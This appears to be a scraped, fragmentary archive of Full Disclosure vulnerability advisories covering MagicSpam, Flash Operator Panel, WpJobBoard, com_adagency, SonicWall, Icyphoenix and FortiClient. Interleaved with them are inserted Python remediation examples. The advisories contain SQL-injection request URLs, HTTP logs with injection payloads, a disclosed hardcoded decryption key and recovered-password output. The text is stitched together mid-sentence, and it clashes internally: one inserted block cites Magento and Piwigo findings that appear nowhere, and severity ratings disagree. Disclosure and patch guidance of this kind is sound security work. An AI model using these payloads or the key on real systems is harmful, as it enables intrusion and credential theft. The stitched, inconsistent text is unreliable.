MagicSpam comes fully-integrated with any Plesk 12+ package, blocking spam at 
the edge before it gets a chance to be filtered. 
There’s no need to change DNS or MX records. And your protection comes ready to 
go with complete logging, statistics, and custom controls.

(Copy of the Homepage: https://www.plesk.com/extensions/magicspam/ )


Abstract Advisory Information:
==
An independent vulnerability laboratory researcher discovered an insecure file 
permission vulnerability in the MagicSpam 2.0.13-1 Plesk extension.



Vulnerability Disclosure Timeline:
==
2017-01-12: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Affected Product(s):

LinuxMagic
Product: MagicSpam - Plesk Extension 2.0.13-1


Exploitation Technique:
===
Remote


Severity Level:
===
Low


Technical Details & Description:

An insecure file permission access vulnerability has been discovered in the 
MagicSpam 2.0.13-1 plesk extension.
The vulnerability allows an attacker to access sensitive information like 
emails without permission or authentication.


Plesk panel features the freemium extension MagicSpam providing 
industry-leading spam protection technologies.
MagicSpam is keeping a detailed log of all e-mail messages processed under 
directory /var/log/magicspam/ in 
Ubuntu installations. A log file is created with the name mslog, with readable 
permissions for everyone, and rotated daily. 
The file will reveal the full list of mailboxes on the server (provided they 
received or sent at least one message in the past).

The security risk of the permission vulnerability is estimated as low with a 
common vulnerability scoring system count of 2.8. 
Successful exploitation of the file permission security vulnerability results 
in information disclosure of emails.


Proof of Concept (PoC):
===
The insecure file permission vulnerability can be exploited by remote attackers 
without user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.

$ id
uid=1002(marco) gid=1011(marco) groups=1011(marco)
$ cd /var/log/magicspam/
$ ls -l
-rw-r--r-- 1 magicspam root 348937 Jan 10 11:50 mslog
$ tail -n1 mslog
2018-01-10 11:51:26 magicspam-daemon[335]: HAM: 
mua=no,ip=[93.94.32.17:mail15.clab99a.contactlab.it],helo=,from=<564020151.35960.1000...@t.contactlab.it>,rcpt=


Solution - Fix & Patch:
===
The security vulnerability can be resolved by excluding the e-mail addresses from 
the affected application log files.
Another solution could be to integrate an authentication mechanism for the 
log file of the MagicSpam web-application.
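Both remedies above can be checked and applied from the host side: an audit that flags log files any local account can read, a permission fix that drops the world-readable bit the `ls -l` output shows, and a redaction step that keeps the domain of each mailbox (useful for delivery debugging) while replacing the local part with a keyed digest. This is an added example written for this page, not LinuxMagic or Plesk code; SAMPLE_LINE copies the layout of the mslog line above with constructed addresses, and REDACTION_KEY is a placeholder that must be replaced by a per-host secret.

```python
import hashlib
import hmac
import os
import re
import stat
import tempfile

# Matches the from=<...> / rcpt=<...> fields of the mslog layout shown above.
ADDR_FIELD = re.compile(r"\b(from|rcpt)=<([^@>]*)@([^>]*)>")

# Placeholder: in deployment load a per-host secret so digests cannot be
# reversed with a dictionary of likely local parts.
REDACTION_KEY = b"replace-with-a-per-host-secret"


def world_readable_files(directory):
    """Return the names of regular files in directory that any local user can read."""
    found = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.stat(path)
        if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_IROTH:
            found.append(name)
    return found


def restrict_log(path, group_readable=True):
    """Drop the world-readable bit: 0644 becomes 0640 (or 0600)."""
    mode = stat.S_IRUSR | stat.S_IWUSR | (stat.S_IRGRP if group_readable else 0)
    os.chmod(path, mode)


def redact_addresses(line):
    """Replace each mailbox local part with a short HMAC digest; keep the domain."""
    def repl(m):
        digest = hmac.new(REDACTION_KEY, m.group(2).encode(), hashlib.sha256).hexdigest()[:10]
        return f"{m.group(1)}=<{digest}@{m.group(3)}>"
    return ADDR_FIELD.sub(repl, line)


# Constructed sample in the mslog layout; addresses and IP are made up.
SAMPLE_LINE = (
    "2018-01-10 11:51:26 magicspam-daemon[335]: HAM: "
    "mua=no,ip=[198.51.100.7:mx.sender.example],helo=,"
    "from=<alice.sender@sender.example>,rcpt=<bob@mailhost.example>"
)


def demo():
    """Build a throw-away log directory, audit it, fix it, and redact a line."""
    tmp = tempfile.mkdtemp()
    public = os.path.join(tmp, "mslog")      # 0644, as in the advisory
    private = os.path.join(tmp, "mslog.1")   # already restricted
    for path, mode in ((public, 0o644), (private, 0o640)):
        with open(path, "w") as fh:
            fh.write(SAMPLE_LINE + "\n")
        os.chmod(path, mode)
    before = world_readable_files(tmp)
    restrict_log(public)
    after = world_readable_files(tmp)
    return before, after, redact_addresses(SAMPLE_LINE)


if __name__ == "__main__":
    print(demo())
```

Redaction alone does not fix the exposure (the file is still readable by everyone), and the permission fix must also be carried into the daily rotation, otherwise the next rotated file comes back with the default mode.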


Security Risk:
==
The security risk of the insecure file permission vulnerability in the plesk 
extension magic spam is estimated as medium (CVSS 2.8).


Credits & Authors:
==
Marco Marsala [ma...@thenetworksolution.it] - 
https://www.vulnerability-lab.com/show.php?user=Marco+Marsala



[FD] Flash Operator Panel v2.31.03 - Command Execution Vulnerability

2018-01-12 Thread Vulnerability Lab
llforward&command


Solution - Fix & Patch:
===
The command injection web vulnerability can be patched by a secure approval of 
the command parameter in the index.php file GET method request. 
Sanitize the command path variable and disallow the usage of special chars to 
prevent further command injection attacks.
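The fix the advisory asks for comes down to two rules: never hand a request parameter to a shell, and map the `command` value through an allowlist instead of sanitising it. The block below is an added example for this page, not Flash Operator Panel code; the action name `callforward` is taken from the request URL above, while the argv templates (which use `echo` so the example runs anywhere), the `ext`/`target` parameters and their digit-only format are assumptions.

```python
import re
import subprocess

# Allowlist: the only actions the panel may trigger, each mapped to a fixed argv
# template. Placeholders in braces are filled from validated parameters.
ACTIONS = {
    "callforward": ["echo", "forward", "{ext}", "{target}"],
    "hangup":      ["echo", "hangup", "{ext}"],
}
# Assumed format for extensions and forward targets: two to six digits.
PARAM_RE = re.compile(r"^[0-9]{2,6}$")


def build_argv(action, **params):
    """Validate the action and its parameters and return an argv list.
    Shell metacharacters inside params are plain data here, never syntax."""
    if action not in ACTIONS:
        raise ValueError(f"unknown action: {action!r}")
    argv = []
    for piece in ACTIONS[action]:
        if piece.startswith("{") and piece.endswith("}"):
            name = piece[1:-1]
            value = params.get(name, "")
            if not PARAM_RE.fullmatch(value):
                raise ValueError(f"invalid {name}: {value!r}")
            argv.append(value)
        else:
            argv.append(piece)
    return argv


def run_action(action, **params):
    """Execute without a shell: subprocess receives the argv list directly, so
    ';', '&&', '$( )' and friends are never interpreted."""
    argv = build_argv(action, **params)
    done = subprocess.run(argv, capture_output=True, text=True, check=True)
    return done.stdout.strip()


if __name__ == "__main__":
    print(run_action("callforward", ext="1001", target="2002"))
```

Note that the allowlist rejects whole requests rather than stripping characters: a value such as `1001;id` is refused instead of being trimmed to `1001`, which keeps the error visible in logs where a detection rule can pick it up.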


Security Risk:
==
The security risk of the command injection vulnerability via path variable in 
the web-application is estimated as high (CVSS 6.2).


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.



[FD] WpJobBoard v4.4.4 - Multiple SQL Injection Vulnerabilities

2018-01-06 Thread Vulnerability Lab
(1%3D2%2C1%2C(SELECT+1+UNION+SELECT+5))>
https://wp-jobboard.localhost:8080/wp-admin/admin.php?page=wpjb-alerts&action=index&filter=all&sort=job_title+desc%2C+IF(1%3D2%2C1%2C(SELECT+1+UNION+SELECT+5))&order=asc>




--- PoC Error Exception Logs ---
Fatal error: Uncaught exception
'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near ''' at line 1
-
Fatal error: Uncaught exception 'wp_wpjb_job' with message 
'You have an error in your SQL syntax; check the manual that corresponds to 
your MySQL server version for the right syntax to use near ''' at line 1


Reference(s):
https://wp-jobboard.localhost:8080/
https://wp-jobboard.localhost:8080/wp-admin/
https://wp-jobboard.localhost:8080/wp-admin/admin.php
https://wp-jobboard.localhost:8080/wp-admin/admin.php?page=wpjb-alerts&action=index&filter=all&sort=
https://wp-jobboard.localhost:8080/wp-admin/admin.php?page=wpjb-job&action=index&filter=1&sort=job_expires_at&order=


Solution - Fix & Patch:
===
The vulnerability can be patched by a restriction of the vulnerable sort and 
order parameters in the web-application GET method request.
Disallow the usage of special chars to prevent malicious inputs and use a 
prepared statement to resolve the sql-injection vulnerability.
Disable the display of errors in the default configuration and include 
exception handling to cover further malicious attacks.


Note: The sql-injections have been prevented from version 4.9.1 up to the 
latest released version 5.1 of the WpJobBoard WordPress plugin.


Security Risk:
==
The security risk of the remote sql-injection web vulnerabilities in the 
wpjobboard web-application is estimated as high (CVSS 6.0).


Credits & Authors:
==
Vulnerability-Lab [resea...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab



[FD] SonicWall SonicOS NSA Web Firewall - Multiple Web Vulnerabilities

2018-01-06 Thread Vulnerability Lab
dapUsrGrpMbrAttr[member]
  ldapUsrGrpMbrType[0]
  ldapUsrGrpOtherMatchAttr[primaryGroupToken]
  cbox_ldapUsrUseOtherGrpAttr[]
  ldapUsrDomain[sjcolo.local]
  usrTreesSel[MALICIOUS PAYLOAD INJECT!]
  ldapTreesAutoConfDomain[]
  ldapAllowReferrals_0[on]
  ldapAllowReferrals_1[on]
  ldapAllowReferrals_2[on]
  ldapAllowReferrals_3[on]
  cbox_ldapAllowReferrals_0[]
  cbox_ldapAllowReferrals_1[]
  cbox_ldapAllowReferrals_2[]
  cbox_ldapAllowReferrals_3[]
  userRadiusCheckLocal[on]
  userRadiusUserGrpsLocal[on]
  selDfltUserGroup[2]
  ldapUsrGrpMirroring[on]
  ldapUsrGrpMirrorPeriod[x]
  ldapUsrGrpMirrorWhat[0]
  cbox_userRadiusCheckLocal[]
  cbox_userRadiusUserGrpsLocal[]
  cbox_ldapUsrGrpMirroring[]
  ldapRelayEnable[on]
  ldapRelayOnLAN[on]
  ldapRelayOnWAN[on]
  ldapRelayOnVPN[on]
  ldapRelaySecret[]
  ldapRelayLegacyVpnUsrGrp[]
  ldapRelayLegacyVpnClientGrp[]
  ldapRelayLegacyL2TPUsrGrp[]
  ldapRelayLegacyInetUsrGrp[]
  ldapRelayHashSecret[]
  cbox_ldapRelayEnable[]
  cbox_ldapRelayOnLAN[]
  cbox_ldapRelayOnWAN[]
  cbox_ldapRelayOnDMZ[]
  cbox_ldapRelayOnWLAN[]
  cbox_ldapRelayOnVPN[]
  Radius_user[]
  Radius_passwd[]
  remAuthTstProtocol[0]
  TestInfo[]
  remAuthTstType[-1]
  rNum[28F5903AD031CF055855192B2F30CC6E]
  testType[1]
  testDesc[LDAP+server]
  ldapUsrsTree_1[MALICIOUS PAYLOAD INJECT!]
   Response Header:
  Server[localhost]
Expires[-1]
  Content-Type[text/html;charset=UTF-8]
-
Status: 200[OK]
GET https://utm_waf.localhost:8512/x[MALICIOUS PAYLOAD EXECUTION!]
Mime Type[unknown]
   Request Header:
  Host[utm_waf.localhost:8512]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 
Firefox/43.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  Referer[https://utm_waf.localhost:8512/ssoAuthProps.html]
  Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 
777=0; 7510=0]


--- PoC Session Logs [POST] ---
Status: 200[OK]
POST https://utm_waf.localhost:8512/main.cgi
Mime Type[text/html]
   Request Header:
  Host[utm_waf.localhost:8512]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 
Firefox/43.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Referer[https://utm_waf.localhost:8512/addServiceObjDlg.html]
  Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 
777=2; 7510=0]
  Connection[keep-alive]
POST-Daten:
  csrfToken[]
  svcObjId_-1[MALICIOUS INJECTED PAYLOAD!]
  svcObjType_-1[1]
  svcObjProperties_-1[4878]
  svcObjIpType_-1[ssh]
  svcObjPort1_-1[1]
  svcObjPort2_-1[1]
  svcObjManagement_-1[0]
  svcObjHigherPrecedence_-1[0]
Response Header:
  Server[localhost]
  Content-Type[text/html;charset=UTF-8]
-
Status: 200[OK]
GET https://utm_waf.localhost:8512/x[MALICIOUS PAYLOAD EXECUTION!]
Mime Type[text/html]
   Request Header:
  Host[utm_waf.localhost:8512]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 
Firefox/43.0]
  Referer[https://utm_waf.sonicwall:8512/ssoAuthProps.html]
  Cookie[curUrl=usersSettingsView.html; curUsr=; tabbedWinAlert=done; 
777=3; 7510=0]
  Connection[keep-alive]
Response Header:
  Server[SonicWALL]
  Content-Type[text/html;charset=UTF-8]


Reference(s):
https://utm_waf.sonicwall:8512/
https://utm_waf.localhost:8512/main.cgi
https://utm_waf.localhost:8512/ldapProps.html
https://utm_waf.sonicwall:8512/ssoAuthProps.html
https://utm_waf.localhost:8512/addServiceObjDlg.html


Solution - Fix & Patch:
===
The vulnerability can be patched by a parse and encode of the vulnerable `Host 
Name / IP Address`, `Client Name/IP Address` and `Proxy Forward To` input fields. 
Encode the following values `ldapServerBindName - usrTreesSel - ldapUsrsTree_1` 
and `svcObjId` to prevent an inject via POST method. Restrict the input fields 
and disallow the usage of special chars. Encode in the last step the output 
listing locations in the `SSO Agents`, `Terminal Services Agent Settings` and 
`RADIUS Accounting Single-Sign-On` modules to prevent the execution points of 
the vulnerabilities. Adjust the filter procedure and set up a more secure 
exception-handling to interact during an invalid execution or unhandled 
exception.

Note: All the security issues are marked as resolved by Dell SonicWall with 
several updates until 2017 Q4.
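The three persistent cross-site scripting findings in this digest (the Magento Connect claim form, the Piwigo status and exception messages, and the SonicOS LDAP settings fields) share one root cause: a submitted value is written back into HTML without context-appropriate encoding. The block below is an added illustration for those three solution sections, not vendor code from any of the projects; the markup in each render function is assumed, and only the shape of the payloads is taken from the session logs above. It shows attribute and text encoding with `html.escape`, plus a scheme check for values that end up in `href`/`src`, since encoding alone would still let a `javascript:` URL through as a link.

```python
import html
from urllib.parse import urlsplit


def esc(value):
    """Escape for HTML text and double-quoted attribute contexts."""
    return html.escape(str(value), quote=True)


def safe_link_url(url):
    """Accept only absolute http(s) URLs for href/src attributes; return ''
    for everything else (javascript:, data:, attribute-breakout junk)."""
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return ""
    return url


def render_claim_form(claimed_url):
    """Magento Connect claim form (assumed markup): the submitted extension URL
    is echoed back in the input field and offered as a link."""
    href = safe_link_url(claimed_url)
    if href:
        link = f'<a href="{esc(href)}">{esc(claimed_url)}</a>'
    else:
        link = f"<span>{esc(claimed_url)}</span>"   # shown, but never a link
    return f'<input name="claim[claimed_extension_url]" value="{esc(claimed_url)}">\n{link}'


def render_extract_error(filename):
    """Piwigo-style plugin status message that echoes a file name (assumed markup)."""
    return f"<p>An error occurred during the files ({esc(filename)}) extraction.</p>"


def render_setting_row(label, value):
    """SonicOS-style settings listing that echoes an LDAP field value (assumed markup)."""
    return f'<tr><td>{esc(label)}</td><td><input value="{esc(value)}"></td></tr>'


if __name__ == "__main__":
    probe = '"><iframe src="javascript:alert(document.cookie)"></iframe>'
    print(render_claim_form(probe))
    print(render_extract_error(probe))
    print(render_setting_row("Host Name / IP Address", probe))
```

The encoding must match the output context: the same `html.escape(..., quote=True)` is correct for element text and double-quoted attributes, but a value placed inside a `<script>` block, a URL query string or an unquoted attribute needs a different encoder, and no encoder makes a `javascript:` URL safe inside `src`, which is why `safe_link_url` exists separately.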


Security Risk:
==
The security risk of the application-side input validation web vulnerability 
and the filter bypass issue are estimated as medium. (CVSS 4.5)


Credits & Authors:
======
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Be

[FD] Wickr Inc - App Clock & Message Deletion Glitch P2 - Bug Bounty

2018-01-06 Thread Vulnerability Lab
Wickr Inc - App Clock & Message Deletion Glitch P2  - Bug Bounty
(Document) [PDF]

URL: https://www.vulnerability-lab.com/get_content.php?id=2107

Vulnerability Magazine:
https://www.vulnerability-db.com/?q=articles/2018/01/04/wickr-inc-app-clock-message-deletion-glitch


[FD] iJoomla com_adagency 6.0.9 - SQL Injection Vulnerabilities

2018-01-04 Thread Vulnerability Lab
vertis.user_id, user.name, user.email, user.block, 
user.username, user.registerDate, count(c.id) count FROM 
#__ad_agency_advertis as advertis LEFT OUTER JOIN #__users as user on 
user.id=advertis.user_id LEFT JOIN #__ad_agency_campaign as c on 
c.aid=advertis.aid WHERE 1=1 AND user.id<>'' AND advertis.approved LIKE 
'%-1'Y%' GROUP BY advertis.aid ORDER BY advertis.ordering ASC
-
You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near 
''Y-1'' AND cb.`campaign_id`=3 GROUP BY b.id ORDE' at line 15 SQL=SELECT b . * 
, camp.id campaign_id, camp.name campaign_name, a.aid AS 
advertiser_id2, a.company AS advertiser, concat( width, 'x', height ) AS 
size_type, m.id mid, m.title zone_name FROM #__ad_agency_banners 
AS b LEFT OUTER JOIN #__ad_agency_advertis AS a ON b.advertiser_id = a.aid LEFT 
JOIN #__ad_agency_campaign_banner AS cb ON cb.banner_id = 
b.id LEFT JOIN #__ad_agency_campaign AS camp ON camp.id = cb.campaign_id LEFT 
JOIN #__ad_agency_order_type AS p ON camp.otid = p.tid LEFT 
JOIN #__modules AS m ON m.id = cb.zone WHERE 1=1 AND b.approved = 'Y-1'' AND 
cb.`campaign_id`=3 GROUP BY b.id ORDER BY b.ordering ASC , 
b.id DESC LIMIT 0,30


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET 
http://joomla.localhost:8080/index.php?option=com_adagency&controller=adagencyAds&status_select=Y-1%27[SQL-INJECTION
 VULNERABILITY!]**&camp_id=3
Mime Type[text/html]
   Request Header:
  Host[joomla.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 
Firefox/48.0]
  Cookie[dacce502d8fa40f12fdba764da41b8cf=8uusag3vgk0544u8phf9c4oa11; 
currentURI=http%3A%2F%2Fjoomla.localhost:8080%2F; 
em_cdn_uid=t%3D1471798050244%26u%3D11f009a55e864578928adec2c70fa876; 
350a4e86045327a856d5c0333a428604=ukf6ldgrs5ekdrukh8p8s422k0; activeProfile=0]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Server[Apache]
  X-Powered-By[PHP/7.0.9]
  P3P[CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"]
  Connection[Keep-Alive]
  Transfer-Encoding[chunked]
  Content-Type[text/html; charset=UTF-8]
-
Status: 200[OK]
GET http://joomla.localhost:8080/index.php?option=com_adagency&controller=adagencyAdvertisers&advertiser_status=-1%27Y[SQL-INJECTION VULNERABILITY!]**
Mime Type[text/html]
   Request Header:
  Host[joomla.localhost:8080]
  User-Agent[Mozilla/5.0 (Windows NT 6.2; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Cookie[jsju=0; 
dacce502d8fa40f12fdba764da41b8cf=8uusag3vgk0544u8phf9c4oa11; 
currentURI=http%3A%2F%2Fjoomla.localhost:8080%2F; 
em_cdn_uid=t%3D1471798050244%26u%3D11f009a55e864578928adec2c70fa876; 
350a4e86045327a856d5c0333a428604=ivi4d2j9782af9h0kntmqi6m43; 
activeProfile=0]
  Connection[keep-alive]
  Upgrade-Insecure-Requests[1]
   Response Header:
  Server[Apache]
  X-Powered-By[PHP/7.0.9]
  P3P[CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"]
  Transfer-Encoding[chunked]
  Content-Type[text/html; charset=UTF-8]


Reference(s):
http://joomla.localhost:8080/
http://joomla.localhost:8080/index.php
http://joomla.localhost:8080/index.php?option=
http://joomla.localhost:8080/index.php?option=com_adagency
http://joomla.localhost:8080/index.php?option=com_adagency&controller
http://joomla.localhost:8080/index.php?option=com_adagency&controller=adagencyAdvertisers
http://joomla.localhost:8080/index.php?option=com_adagency&controller=adagencyAdvertisers&advertiser_status
http://joomla.localhost:8080/administrator/index.php?option=com_adagency&controller=adagencyAdvertisers&advertiser_status


Solution - Fix & Patch:
===
The vulnerability can be patched by securely parsing and restricting the
vulnerable `advertiser_status` and `status_select` parameters in the
com_adagency component. Disallow the usage of special chars, escape the
input and use a prepared statement to prevent exploitation of the
vulnerabilities.

Note: The vulnerability has been resolved in the last com_adagency component
updates in 2017 Q1-4.


Security Risk:
==
The security risk of the remote SQL injection web vulnerabilities in the
com_adagency 6.0.9 Joomla component is estimated as high (CVSS 7.1).


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed or 
implied, including the warranties of merchantability and capability for a 
particular purp

[FD] Icyphoenix 2.2.0.105 - Multiple SQL Injection Vulnerabilities

2018-01-04 Thread Vulnerability Lab
Solution - Fix & Patch:
===
Escape and parse the vulnerable parameters and use a prepared statement to
protect the SQL query.
Restrict the input and filter it to disallow the usage of special chars to
prevent further attacks.
Disable the display of SQL error messages in the default CMS configuration.

Note: The issues are known to have been resolved in the version updates
released during 2017.
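The fix that both this advisory and the com_adagency advisory above recommend (allowlist the status value, bind it as a prepared-statement parameter, keep database errors out of the response), as an added example that is not code from either project; it uses Python with sqlite3 so it runs stand-alone, and the table, rows and logger name are constructed.

```python
import logging
import sqlite3

log = logging.getLogger("status_filter")

# Allowlist of legal values for a status filter such as advertiser_status or
# status_select. The injected values shown in the logs ("Y-1'" and "-1'Y")
# never reach the query: they fail this check first.
ALLOWED_STATUS = frozenset({"Y", "N"})


def normalize_status(raw):
    """Return the validated status value, or None when the input is unusable."""
    if raw is None:
        return None
    value = raw.strip()
    return value if value in ALLOWED_STATUS else None


def fetch_advertisers(conn, status=None):
    """Run the filtered query with the value bound as a parameter.

    The SQL text is fixed; only the placeholder value changes, so the driver
    never has to guess where the data ends and the SQL begins.
    """
    sql = "SELECT aid, company FROM ad_agency_advertis WHERE 1=1"
    params = []
    if status is not None:
        sql += " AND approved = ?"
        params.append(status)
    sql += " ORDER BY ordering ASC"
    return conn.execute(sql, params).fetchall()


def safe_fetch_advertisers(conn, raw_status):
    """Validate the parameter, run the query, and keep database errors out of
    the HTTP response (the leaked MySQL error text is what confirmed the
    injection in the session logs above)."""
    status = normalize_status(raw_status)
    if raw_status is not None and status is None:
        # Log the rejected value hex-encoded so it cannot break log parsing.
        log.warning("rejected status filter value: %s", raw_status.encode().hex())
        return []
    try:
        return fetch_advertisers(conn, status)
    except sqlite3.Error as exc:
        log.error("advertiser query failed: %s", exc)  # server-side log only
        return []


def build_sample_db():
    """Constructed in-memory stand-in for the #__ad_agency_advertis table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE ad_agency_advertis "
        "(aid INTEGER, company TEXT, approved TEXT, ordering INTEGER)"
    )
    conn.executemany(
        "INSERT INTO ad_agency_advertis VALUES (?, ?, ?, ?)",
        [(1, "Acme", "Y", 1), (2, "Globex", "N", 2), (3, "Initech", "Y", 3)],
    )
    return conn


if __name__ == "__main__":
    db = build_sample_db()
    for raw in ("Y", "N", "Y-1'", "-1'Y", None):
        rows = safe_fetch_advertisers(db, raw)
        print("%-8r -> %d row(s)" % (raw, len(rows)))
```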


Security Risk:
==
The security risk of the remote SQL injection vulnerabilities in the content
management system is estimated as medium (CVSS 5.0).


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri 
(http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)





-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com


___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

[FD] SonicWall SonicOS NSA UTM Firewall - Bypass & Persistent Vulnerability

2018-01-04 Thread Vulnerability Lab
22%26lt%3Bimg+src%3D%22x%22%26gt%3B%2520%2520%26gt%3B%22%26lt%3Biframe+src%3Da%26gt%3B%2520%26lt%3Biframe%26gt%3B]
  refresh_page[securityServicesCFView.html]
  tableIndex[-1]
  cgiaction[%5Bobject+Window%5D]


--- PoC Session Logs (POST) [Inject] #2 ---
Status: pending[]
POST https://utm_waf.sonicwall.localhost:8351/main.cgi 
Mime Type[unknown]
   Request Header:
  Host[utm_waf.sonicwall.localhost:8351]
  User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0]
  Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
  Accept-Language[de,en-US;q=0.7,en;q=0.3]
  Accept-Encoding[gzip, deflate]
  Referer[https://utm_waf.sonicwall.localhost:8351/gavCloudExclusions.html]
POST-Daten:
  csrfToken[???]
  inputbox[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E]
  list[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E]
  gav_cloud_exclude_list[123123123+%22%3E%3CMALIICOUS INJECTED 
PAYLOAD!+src%3Da%3E]
  gav_cloud_refresh_exclusions[]
  refresh_page[gav_cloud.html]
  isobject[1]
  cgiaction[%5Bobject+Window%5D]


Reference(s):
https://utm_waf.sonicwall.localhost:8351/main.cgi
https://utm_waf.sonicwall.localhost:8351/gavCloudExclusions.html
https://utm_waf.sonicwall.localhost:8351/addTrustedDomainDlg.html


Solution - Fix & Patch:
===
The vulnerability can be patched by setting up a secure validation for the
update inputbox save procedure. Use the same validation as on the add procedure.
Encode the content and disallow usage of special chars in the item list when
processing an add. Parse the content and filter the input before
the permanent save that finally displays the content in the main item list to
prevent an application-side script code execution.

Note: The vulnerabilities have been reported to the Dell security team. The
issue was resolved by the SonicWall developers between 2016 Q4 and 2017 Q4.


Security Risk:
==
The security risk of the application-side input validation web vulnerability
and the filter bypass issue is estimated as medium (CVSS 4.5).


Credits & Authors:
==
Benjamin K.M. [b...@vulnerability-lab.com] - 
https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.



[FD] SEC Consult SA-20171213-0 :: VPN credentials disclosure in Fortinet FortiClient

2017-12-13 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20171213-0 >
===
  title: VPN credentials disclosure
product: Fortinet FortiClient
 vulnerable version: <4.4.2335 on Linux, <5.6.1 on Windows,
 <5.6.1 on Mac OSX
  fixed version: 4.4.2335 on Linux, 5.6.1 on Windows, 5.6.1 on Mac OS X
 CVE number: CVE-2017-14184
 impact: High
   homepage: https://www.fortinet.com/ | http://forticlient.com/
  found: 2017-08-29
 by: M. Li (Office Singapore)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
 Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

 https://www.sec-consult.com

===

Vendor description:
---
"From the start, the Fortinet vision has been to deliver broad, truly
integrated, high-performance security across the IT infrastructure.

We provide top-rated network and content security, as well as secure access
products that share intelligence and work together to form a cooperative
fabric. Our unique security fabric combines Security Processors, an intuitive
operating system, and applied threat intelligence to give you proven security,
exceptional performance, and better visibility and control--while providing
easier administration."

Source: https://www.fortinet.com/corporate/about-us/about-us.html


Business recommendation:

The patched FortiClient versions should be installed immediately as the VPN
credentials could be decrypted by an attacker.


Vulnerability overview/description:
---
FortiClient stores the VPN authentication credentials in a configuration file
(on Linux or Mac OSX) or in the registry (on Windows). The credentials are
encrypted but can still be recovered since the decryption key is hardcoded
in the program and the same on all installations. Above all, the aforementioned
storage is world readable, which actually lays the foundation for the
credential recovery.


Proof of concept:
-
1) Hardcoded key
The hardcoded key can be disclosed on the Linux version by issuing the following
command:
$ strings forticlientsslvpn |grep "fc_1A"
fc_1A2Brown3Fox4Jumped5Over6A7Lazy8Dog

The same decryption key can be found in the Windows and Mac OSX binary.


2) Overly permissive access control
The read access of the configuration file is set for "others" too, making the
file world-readable. On Mac OSX, the file can be found under
/Library/Application Support/Fortinet/FortiClient/conf/vpn.plist
while the same dataset is stored in the registry key
HKLM\SOFTWARE\WOW6432Node\Fortinet\FortiClient\Sslvpn\Tunnels
on Windows, which is world-readable for all users as well.

$ ls -l /home/user/.fctsslvpnhistory
-rw-rw-rw- 1 root root 1227 Aug 23 12:26 .fctsslvpnhistory
$ cat /home/user/.fctsslvpnhistory
...
profile=demo
p12passwdenc=Enc 420d2ee65abded897a69c50f4995397969f1c1f949055d8e51
path=
passwordenc=Enc 420d2ee65abded897a69c50f49956909f61e3e549873cdfecf12bafdfa7b78f789a17ba1a5a6c9eb1803
user=li
port=443
server=server.com
...


Combining the two issues, an attacker can steal the password of any user who
has a FortiClient profile on the system. In an enterprise environment, where
employees usually log onto the VPN server with their domain credentials, a
malicious employee can extensively harvest the credentials of colleagues by
logging onto the workstation where the credentials have been stored. Hence an
attacker might steal the credentials of any user in the domain and gain access
to their user account (e.g. emails, other private data).


SEC Consult developed a proof of concept tool which takes the encrypted
string as input and prints the decrypted hexadecimal bytes followed by the
recovered password. For now, this tool will not be released to give users more
time to patch.


$ kr
420d2ee65abded897a69c50f49956909f61e3e549873cdfecf12bafdfa7b78f789a17ba1a5a6c9eb1803
0x50  0x61  0x73  0x73  0x77  0x6f  0x72  0x64
0x52  0x65  0x63  0x6f  0x76  0x65  0x72  0x65
0x64  0x00
PasswordRecovered
